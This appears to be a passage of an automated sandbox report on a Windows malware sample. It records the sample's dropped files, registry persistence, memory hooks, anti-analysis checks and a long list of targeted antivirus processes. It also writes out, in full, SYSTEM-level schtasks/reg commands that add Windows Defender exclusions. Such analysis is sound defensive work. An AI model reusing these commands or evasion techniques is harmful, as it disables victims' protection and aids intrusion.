              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exe; Section loaded: devobj.dll
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exe; Section loaded: msasn1.dll
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exe; Section loaded: msdmo.dll
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exe; Section loaded: avicap32.dll
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exe; Section loaded: msvfw32.dll
              Source: C:\Program Files (x86)\8srsV\pw8XjN.exe; Section loaded: apphelp.dll
              Source: C:\Program Files (x86)\8srsV\pw8XjN.exe; Section loaded: kernel.appcore.dll
              Source: C:\Program Files (x86)\8srsV\pw8XjN.exe; Section loaded: uxtheme.dll
              Source: C:\Program Files (x86)\8srsV\pw8XjN.exe; Section loaded: tbcore3u.dll
              Source: C:\Users\user\Desktop\2o63254452-763487230.06.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
              Source: C:\Users\user\Documents\BEqRkb.exe; File written: C:\Users\Public\Music\destopbak.ini
              Source: 2o63254452-763487230.06.exe; Static PE information: Image base 0x140000000 > 0x60000000
              Source: 2o63254452-763487230.06.exe; Static file information: File size 30965248 > 1048576
              Source: 2o63254452-763487230.06.exe; Static PE information: Raw size of .data is bigger than: 0x100000 < 0x1d58400
              Source: 2o63254452-763487230.06.exe; Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
              Source: 2o63254452-763487230.06.exe; Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
              Source: 2o63254452-763487230.06.exe; Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
              Source: 2o63254452-763487230.06.exe; Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: 2o63254452-763487230.06.exe; Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
              Source: 2o63254452-763487230.06.exe; Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
              Source: Binary string: d:\work\iGiveButton\toolbar4\Release_bin\uninstall.pdb source: 2dHqG0.exe, 00000028.00000002.3513701464.000000000075E000.00000004.00000020.00020000.00000000.sdmp, 2dHqG0.exe, 00000028.00000002.3514252671.0000000000B28000.00000002.00000001.01000000.0000000A.sdmp, 2dHqG0.exe, 00000028.00000000.3214205263.0000000000B28000.00000002.00000001.01000000.0000000A.sdmp, 2dHqG0.exe, 00000029.00000002.3248013208.0000000000B28000.00000002.00000001.01000000.0000000A.sdmp, 2dHqG0.exe, 00000029.00000000.3240358460.0000000000B28000.00000002.00000001.01000000.0000000A.sdmp, pw8XjN.exe, 0000002A.00000000.3243643193.00000000006C8000.00000002.00000001.01000000.0000000C.sdmp, pw8XjN.exe, 0000002A.00000002.3251689620.00000000006C8000.00000002.00000001.01000000.0000000C.sdmp, 2dHqG0.exe, 0000002D.00000000.3262531939.0000000000B28000.00000002.00000001.01000000.0000000A.sdmp, 2dHqG0.exe, 0000002D.00000002.3274838743.0000000000B28000.00000002.00000001.01000000.0000000A.sdmp, pw8XjN.exe, 0000002E.00000002.3274822445.00000000006C8000.00000002.00000001.01000000.0000000C.sdmp, pw8XjN.exe, 0000002E.00000000.3265224479.00000000006C8000.00000002.00000001.01000000.0000000C.sdmp, pw8XjN.exe, 0000002F.00000000.3373599420.00000000006C8000.00000002.00000001.01000000.0000000C.sdmp, pw8XjN.exe, 0000002F.00000002.3379229347.00000000006C8000.00000002.00000001.01000000.0000000C.sdmp, 2dHqG0.exe, 00000030.00000002.3386248776.0000000000B28000.00000002.00000001.01000000.0000000A.sdmp, 2dHqG0.exe, 00000030.00000000.3380355601.0000000000B28000.00000002.00000001.01000000.0000000A.sdmp, 2dHqG0.exe.7.dr, pw8XjN.exe.40.dr
              Source: Binary string: c:\tools_git_priv\truesight\driver\objfre_win7_amd64\amd64\TrueSight.pdb source: 189atohci.sys.0.dr
              Source: Binary string: y:\avsdk5\engine\make\build\public\64-bit\vseamps.pdb source: 2o63254452-763487230.06.exe, 00000000.00000003.2163760309.0000000004882000.00000004.00000020.00020000.00000000.sdmp, 2o63254452-763487230.06.exe, 00000000.00000003.2125107518.0000000004881000.00000004.00000020.00020000.00000000.sdmp, 2o63254452-763487230.06.exe, 00000000.00000003.2163675953.00000000048A1000.00000004.00000020.00020000.00000000.sdmp, 2o63254452-763487230.06.exe, 00000000.00000003.2163570834.00000000048A1000.00000004.00000020.00020000.00000000.sdmp, BEqRkb.exe, 00000004.00000002.2271380467.0000000140014000.00000002.00000001.01000000.00000008.sdmp, BEqRkb.exe, 00000004.00000000.2265682349.0000000140014000.00000002.00000001.01000000.00000008.sdmp, BEqRkb.exe, 00000005.00000000.2272964825.0000000140014000.00000002.00000001.01000000.00000008.sdmp, BEqRkb.exe, 00000005.00000002.2278285025.0000000140014000.00000002.00000001.01000000.00000008.sdmp, BEqRkb.exe, 00000007.00000000.2775277441.0000000140014000.00000002.00000001.01000000.00000008.sdmp
              Source: 2o63254452-763487230.06.exe; Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
              Source: 2o63254452-763487230.06.exe; Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
              Source: 2o63254452-763487230.06.exe; Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
              Source: 2o63254452-763487230.06.exe; Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
              Source: 2o63254452-763487230.06.exe; Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

              Data Obfuscation

              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exe; Unpacked PE file: 40.2.2dHqG0.exe.2540000.3.unpack
              Source: C:\Users\user\Documents\BEqRkb.exe; Code function: 4_2_000000014000F000 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,4_2_000000014000F000
              Source: initial sample; Static PE information: section where entry point is pointing to: .mo:
              Source: tbcore3U.dll.7.dr; Static PE information: section name: .%?.
              Source: tbcore3U.dll.7.dr; Static PE information: section name: .%-[
              Source: tbcore3U.dll.7.dr; Static PE information: section name: .mo:
              Source: tbcore3U.dll.40.dr; Static PE information: section name: .%?.
              Source: tbcore3U.dll.40.dr; Static PE information: section name: .%-[
              Source: tbcore3U.dll.40.dr; Static PE information: section name: .mo:
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exe; Code function: 40_2_00B22691 push ecx; ret 40_2_00B226A4
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exe; Code function: 40_2_02552254 push ecx; ret 40_2_02552267
              Source: C:\Program Files (x86)\8srsV\pw8XjN.exe; Code function: 42_2_006C2691 push ecx; ret 42_2_006C26A4

              Persistence and Installation Behavior

              Source: C:\Users\user\Desktop\2o63254452-763487230.06.exe; File created: C:\Users\user\Documents\vselog.dll
              Source: C:\Users\user\Desktop\2o63254452-763487230.06.exe; File created: C:\Users\user\Documents\BEqRkb.exe
              Source: C:\Users\user\Desktop\2o63254452-763487230.06.exe; File created: C:\Windows\System32\drivers\189atohci.sys
              Source: C:\Windows\System32\cmd.exe; Process created: reg.exe
              Source: C:\Users\user\Documents\BEqRkb.exe; File created: C:\Program Files (x86)\2dHqG0\2dHqG0.exe
              Source: C:\Users\user\Documents\BEqRkb.exe; File created: C:\Program Files (x86)\2dHqG0\tbcore3U.dll
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exe; File created: C:\Program Files (x86)\8srsV\tbcore3U.dll
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exe; File created: C:\Program Files (x86)\8srsV\pw8XjN.exe

              Boot Survival

              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exe; Key value created or modified: HKEY_CURRENT_USER\System\CurrentControlSet\Services\Sauron Groupfenzhu
              Source: C:\Windows\System32\cmd.exe; Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f"
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exe; Registry key created: HKEY_CURRENT_USER\System\CurrentControlSet\Services\Sauron
              Source: C:\Users\user\Documents\BEqRkb.exe; Code function: 4_2_0000000140001520 OpenSCManagerW,GetLastError,OpenServiceW,GetLastError,CloseServiceHandle,DeleteService,GetLastError,CloseServiceHandle,CloseServiceHandle,StartServiceCtrlDispatcherW,4_2_0000000140001520

              Hooking and other Techniques for Hiding and Protection

              Source: C:\Users\user\Documents\BEqRkb.exe; Memory written: PID: 8164 base: 7FFE22370008 value: E9 EB D9 E9 FF
              Source: C:\Users\user\Documents\BEqRkb.exe; Memory written: PID: 8164 base: 7FFE2220D9F0 value: E9 20 26 16 00
              Source: C:\Users\user\Documents\BEqRkb.exe; Memory written: PID: 8188 base: 7FFE22370008 value: E9 EB D9 E9 FF
              Source: C:\Users\user\Documents\BEqRkb.exe; Memory written: PID: 8188 base: 7FFE2220D9F0 value: E9 20 26 16 00
              Source: C:\Users\user\Documents\BEqRkb.exe; Memory written: PID: 5776 base: 7FFE22370008 value: E9 EB D9 E9 FF
              Source: C:\Users\user\Documents\BEqRkb.exe; Memory written: PID: 5776 base: 7FFE2220D9F0 value: E9 20 26 16 00
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exe; Memory written: PID: 5576 base: 8A0005 value: E9 8B 2F 66 76
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exe; Memory written: PID: 5576 base: 76F02F90 value: E9 7A D0 99 89
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exe; Memory written: PID: 5576 base: DC0005 value: E9 8B 2F 14 76
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exe; Memory written: PID: 5576 base: 76F02F90 value: E9 7A D0 EB 89
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exe; Memory written: PID: 5268 base: FE0005 value: E9 8B 2F F2 75
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exe; Memory written: PID: 5268 base: 76F02F90 value: E9 7A D0 0D 8A
              Source: C:\Program Files (x86)\8srsV\pw8XjN.exe; Memory written: PID: 6112 base: 6B0005 value: E9 8B 2F 85 76
              Source: C:\Program Files (x86)\8srsV\pw8XjN.exe; Memory written: PID: 6112 base: 76F02F90 value: E9 7A D0 7A 89
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exe; Memory written: PID: 8084 base: 960005 value: E9 8B 2F 5A 76
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exe; Memory written: PID: 8084 base: 76F02F90 value: E9 7A D0 A5 89
              Source: C:\Program Files (x86)\8srsV\pw8XjN.exe; Memory written: PID: 7624 base: 1130005 value: E9 8B 2F DD 75
              Source: C:\Program Files (x86)\8srsV\pw8XjN.exe; Memory written: PID: 7624 base: 76F02F90 value: E9 7A D0 22 8A
              Source: C:\Program Files (x86)\8srsV\pw8XjN.exe; Memory written: PID: 2520 base: FC0005 value: E9 8B 2F F4 75
              Source: C:\Program Files (x86)\8srsV\pw8XjN.exe; Memory written: PID: 2520 base: 76F02F90 value: E9 7A D0 0B 8A
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exe; Memory written: PID: 940 base: 1650005 value: E9 8B 2F 8B 75
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exe; Memory written: PID: 940 base: 76F02F90 value: E9 7A D0 74 8A
              Source: C:\Users\user\Documents\BEqRkb.exe; Process information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Documents\BEqRkb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              Source: 2dHqG0.exe, 00000028.00000002.3515359627.000000000306D000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: {4E062DDA-444A-A2A8-84CE-E105F66A5AB3}SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEMCONSENTPROMPTBEHAVIORADMINSOFTWARE\PERFRPOOLSOFTWARE\PPFR49/56/235/24;9161POSTDATAC:\WINDOWS\SYSWOW64\DRIVERS\189ATOHCI.SYS360SAFE.EXE360SD.EXE360RP.EXE360RPS.EXESRAGENT.EXE360TRAY.EXEZHUDONGFANGYU.EXEKANKAN.EXESUPERKILLER.EXELIVEUPDATE360.EXEMODULEUPDATE.EXEFILESMASHER.EXEAGREEMENTVIEWER.EXESOFTMGRLITE.EXE360LEAKFIXER.EXE360SDRUN.EXE360SDUPD.EXE360FILEGUARD.EXEDEP360.EXEDUMPUPER.EXEDSMAIN.EXEDSMAIN64.EXEFIRSTAIDBOX.EXECHECKSM.EXEHIPSMAIN.EXEHIPSDAEMON.EXEHIPSTRAY.EXEHRUPDATE.EXEHIPSLOG.EXENETFLOW.EXEAUTORUNS.EXEUSYSDIAG.EXEWSCTRLSVC.EXEWSCTRL.EXEKXEMAIN.EXEKXESCORE.EXEKSCAN.EXEKXECENTER.EXEKXETRAY.EXEKDINFOMGR.EXEKISLIVE.EXEKNEWVIP.EXEKSOFTPURIFIER.EXEKTRASHAUTOCLEAN.EXEKAUTHORITYVIEW.EXETQCLIENT.EXETQEDRNAME.EXETQSAFEUI.EXETQTRAY.EXETRANTORAGENT.EXETQDEFENDER.EXETQUPDATEUI.EXETQWATERMARK.EXEDLPAPPDATA.EXENACLDIS.EXEMSMPENG.EXEMPCMDRUN.EXELDSHELPER.EXELDSSECURITY.EXELDSSECURITYAIDER.EXECOMPUTERZTRAY.EXECOMPUTERCENTER.EXEGUARDHP.EXECOMPUTERZ_CN.EXECOMPUTERZSERVICE.EXECOMPUTERZSERVICE_X64.EXEHDW_DISK_SCAN.EXECOMPUTERZMONHELPER.EXEDRVMGR.EXEWEB_HOST.EXE2345SAFECENTERSVC.EXE2345RTPROTECT.EXE2345SAFESVC.EXE2345MPCSAFE.EXE2345SAFETRAY.EXE2345SAFEUPDATE.EXE2345VIRUSSCAN.EXE2345MANUUPDATE.EXE2345ADRTPROTECT.EXE2345AUTHORITYPROTECT.EXE2345EXTSHELL.EXE2345EXTSHELL64.EXE2345FILESHRE.EXE2345LEAKFIXER.EXE2345LSPFIX.EXE2345PCSAFEBOOTASSISTANT.EXE2345RTPROTECTCENTER.EXE2345SHELLPRO.EXE2345SYSDOCTOR.EXELENOVOPCMANAGERSERVICE.EXELENOVOPCMANAGER.EXELAVSERVICE.EXELENOVOTRAY.EXELNVSVCFDN.EXEWSCTRL7.EXEWSCTRL10.EXEWSCTRL11.EXELENOVOAPPUPDATE.EXELENOVOAPPSTORE.EXEDESKTOPASSISTANTAPP.EXEDESKTOPASSISTANT.EXELENOVOMONITORMANAGER.EXELENOVOOKM.EXELEASHIVE.EXESTARTUPMANAGER.EXEWSPLUGINHOST.EXEWSPLUGINHOST64.EXECRASHPAD_HANDLER.EXESEARCHENGINE.EXELISFSERVICE
.EXELSF.EXEAPPVANT.EXELENOVOINTERNETSOFTWAREFRAMEWORK.EXEEMDRIVERASSIST.EXELEAPPOM.EXEHOTFIXPLATFORM.EXEMSPCMANAGER.EXEMSPCMANAGERSERVICE.EXEAVP.EXEAVPUI.EXEAVASTSVC.EXEASWTOOLSSVC.EXEASWIDSAGENT.EXEWSC_PROXY.EXEAVASTUI.EXEAVIRA.SPOTLIGHT.SERVICE.EXEENDPOINTPROTECTION.EXESENTRYEYE.EXEAVIRA.SPOTLIGHT.COMMON.UPDATER.EXEAVIRA.SPOTLIGHT.FALLBACKUPDATER.EXEAVIRA.SPOTLIGHT.UI.APPLICATION.EXEAVIRA.SPOTLIGHT.SYSTRAY.APPLICATION.EXEAVIRA.OPTIMIZERHOST.EXEAVIRA.SPOTLIGHT.BOOTSTRAPPER.EXEAVIRA.SPOTLIGHT.SERVICE.WORKER.EXEAVIRA.SPOTLIGHT.COMMON.UPDATERTRACKER.EXEAVIRA.SPOTLIGHT.UI.APPLICATION.MESSAGING.EXEAVIRA.SPOTLIGHT.UI.ADMINISTRATIVERIGHTSPROVIDER.EXEMFEMMS.EXEMFEVTPS.EXEMCAPEXE.EXEMCSHIELD.EXEMCUICNT.EXEMFEAVSVC.EXENISSRV.EXESECURITYHEALTHSYSTRAY.EXEKWSPROTECT64.EXEQMDL.EXEQMPERSONALCENTER.EXEQQPCPATCH.EXEQQPCREALTIMESPEEDUP.EXEQQPCRTP.EXEQQPCTRAY.EXEQQREPAIR.EXEQQPCMGRUPDATE.EXEKSAFETRAY.EXEMPCOPYACCELERATOR.EXEUNTHREAT.EXEK7TSECURITY.EXEAD-WATCH.EXEPSAFESYSTRAY.EXEVSSERV.EXEREMUPD.EXERTVSCAN.EXEASHDISP.EXEAVCENTER.EXETMBMSRV.EXEKNSDTRAY.EXEV3SVC.EXEMSSECESS.EXEQUHLPSVC.EXERAVMOND.EXEKVMONXP.EXEBAIDUSAFETRAY.EXEBAIDUSD.EXEBKA.EXEBKA
              Source: 2dHqG0.exe, 00000028.00000002.3515359627.000000000306D000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: AUTORUNS.EXE
              Source: C:\Users\user\Desktop\2o63254452-763487230.06.exeRDTSC instruction interceptor: First address: 140001190 second address: 1400011A7 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 dec eax 0x00000007 or eax, edx 0x00000009 dec eax 0x0000000a mov ecx, eax 0x0000000c nop 0x0000000d nop 0x0000000e dec eax 0x0000000f xor edx, edx 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 fldpi 0x00000015 frndint 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\2o63254452-763487230.06.exeRDTSC instruction interceptor: First address: 1400011A7 second address: 1400011A7 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 dec eax 0x00000007 xor ebx, ebx 0x00000009 dec eax 0x0000000a mov ebx, edx 0x0000000c dec eax 0x0000000d or eax, ebx 0x0000000f dec eax 0x00000010 sub eax, ecx 0x00000012 nop 0x00000013 dec ebp 0x00000014 xor edx, edx 0x00000016 dec esp 0x00000017 mov edx, eax 0x00000019 dec ebp 0x0000001a cmp edx, eax 0x0000001c jc 00007FE98481ADE0h 0x0000001e fldpi 0x00000020 frndint 0x00000022 rdtsc
              Source: C:\Users\user\Documents\BEqRkb.exeRDTSC instruction interceptor: First address: 538E55 second address: 538E63 instructions: 0x00000000 rdtsc 0x00000002 dec esp 0x00000003 mov ecx, edx 0x00000005 dec ecx 0x00000006 shl ecx, 20h 0x00000009 dec esp 0x0000000a or ecx, eax 0x0000000c frndint 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\2o63254452-763487230.06.exe Dropped PE file which has not been started: C:\Windows\System32\drivers\189atohci.sys
              Source: C:\Users\user\Documents\BEqRkb.exe Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess graph_4-14013
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exe Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep graph_40-3866
              Source: C:\Program Files (x86)\8srsV\pw8XjN.exe Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep graph_42-3247
              Source: C:\Users\user\Documents\BEqRkb.exe API coverage: 2.7 %
              Source: C:\Users\user\Documents\BEqRkb.exe TID: 1344 Thread sleep time: -60000s >= -30000s
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exe TID: 1060 Thread sleep time: -30000s >= -30000s
              Source: C:\Users\user\Documents\BEqRkb.exe Last function: Thread delayed
              Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exeLast function: Thread delayed
              Source: C:\Users\user\Documents\BEqRkb.exeCode function: 4_2_00007FFE1A51A1B8 FindFirstFileExW,4_2_00007FFE1A51A1B8
              Source: C:\Users\user\Documents\BEqRkb.exe Thread delayed: delay time: 60000
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exe Thread delayed: delay time: 30000
              Source: C:\Users\user\Documents\BEqRkb.exe File opened: C:\Users\user\AppData\Roaming
              Source: C:\Users\user\Documents\BEqRkb.exe File opened: C:\Users\user
              Source: C:\Users\user\Documents\BEqRkb.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer
              Source: C:\Users\user\Documents\BEqRkb.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
              Source: C:\Users\user\Documents\BEqRkb.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini
              Source: C:\Users\user\Documents\BEqRkb.exe File opened: C:\Users\user\AppData
              Source: BEqRkb.exe, 00000007.00000003.2985203284.000000000052A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: 2dHqG0.exe, 00000028.00000002.3513701464.00000000007F9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: C:\Users\user\Documents\BEqRkb.exe API call chain: ExitProcess graph end node graph_4-14014
              Source: C:\Users\user\Documents\BEqRkb.exe API call chain: ExitProcess graph end node graph_4-14358
              Source: C:\Users\user\Desktop\2o63254452-763487230.06.exe Process information queried: ProcessInformation
              Source: C:\Users\user\Documents\BEqRkb.exeCode function: 4_2_00000001400073E0 LdrLoadDll,4_2_00000001400073E0
              Source: C:\Users\user\Documents\BEqRkb.exeCode function: 4_2_0000000140007C91 RtlCaptureContext,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_0000000140007C91
              Source: C:\Users\user\Documents\BEqRkb.exeCode function: 4_2_000000014000F000 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,4_2_000000014000F000
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exeCode function: 40_3_02540643 mov eax, dword ptr fs:[00000030h]40_3_02540643
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exeCode function: 40_3_025400CD mov eax, dword ptr fs:[00000030h]40_3_025400CD
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exeCode function: 40_3_02440643 mov eax, dword ptr fs:[00000030h]40_3_02440643
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exeCode function: 40_3_024400CD mov eax, dword ptr fs:[00000030h]40_3_024400CD
              Source: C:\Users\user\Documents\BEqRkb.exeCode function: 4_2_0000000140004630 GetProcessHeap,HeapReAlloc,GetProcessHeap,HeapAlloc,4_2_0000000140004630
              Source: C:\Users\user\Documents\BEqRkb.exe Process token adjusted: Debug
              Source: C:\Users\user\Documents\BEqRkb.exeCode function: 4_2_00000001400106B0 RtlCaptureContext,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_00000001400106B0
              Source: C:\Users\user\Documents\BEqRkb.exeCode function: 4_2_00000001400092E0 SetUnhandledExceptionFilter,4_2_00000001400092E0
              Source: C:\Users\user\Documents\BEqRkb.exeCode function: 4_2_00007FFE1A5176E0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_00007FFE1A5176E0
              Source: C:\Users\user\Documents\BEqRkb.exeCode function: 4_2_00007FFE1A511F50 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_00007FFE1A511F50
              Source: C:\Users\user\Documents\BEqRkb.exeCode function: 4_2_00007FFE1A512630 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_00007FFE1A512630
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exeCode function: 40_2_00B22AE2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,40_2_00B22AE2
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exeCode function: 40_2_00B210CC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,40_2_00B210CC
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exeCode function: 40_2_00B251FB __NMSG_WRITE,_raise,SetUnhandledExceptionFilter,UnhandledExceptionFilter,40_2_00B251FB
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exeCode function: 40_2_02541640 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,40_2_02541640
              Source: C:\Program Files (x86)\8srsV\pw8XjN.exeCode function: 42_2_006C2AE2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,42_2_006C2AE2
              Source: C:\Program Files (x86)\8srsV\pw8XjN.exeCode function: 42_2_006C10CC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,42_2_006C10CC
              Source: C:\Program Files (x86)\8srsV\pw8XjN.exeCode function: 42_2_006C51FB __NMSG_WRITE,_raise,SetUnhandledExceptionFilter,UnhandledExceptionFilter,42_2_006C51FB

              HIPS / PFW / Operating System Protection Evasion

              Source: C:\Users\user\Documents\BEqRkb.exe NtAllocateVirtualMemory: Indirect: 0x140006FD0
              Source: C:\Users\user\Documents\BEqRkb.exe NtProtectVirtualMemory: Indirect: 0x2A3B253
              Source: C:\Users\user\Documents\BEqRkb.exe NtProtectVirtualMemory: Indirect: 0x2B1B253
              Source: C:\Users\user\Documents\BEqRkb.exe NtProtectVirtualMemory: Indirect: 0x29EB253
              Source: C:\Users\user\Desktop\2o63254452-763487230.06.exe NtDelayExecution: Indirect: 0x1994D1
              Source: C:\Users\user\Documents\BEqRkb.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
              Source: C:\Users\user\Documents\BEqRkb.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
              Source: C:\Users\user\Documents\BEqRkb.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
              Source: C:\Users\user\Documents\BEqRkb.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"%USERPROFILE%\Documents\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
              Source: C:\Users\user\Documents\BEqRkb.exe Process created: C:\Program Files (x86)\2dHqG0\2dHqG0.exe "C:\Program Files (x86)\2dHqG0\2dHqG0.exe"
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f"
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1"
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /F
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f"
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1"
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /F
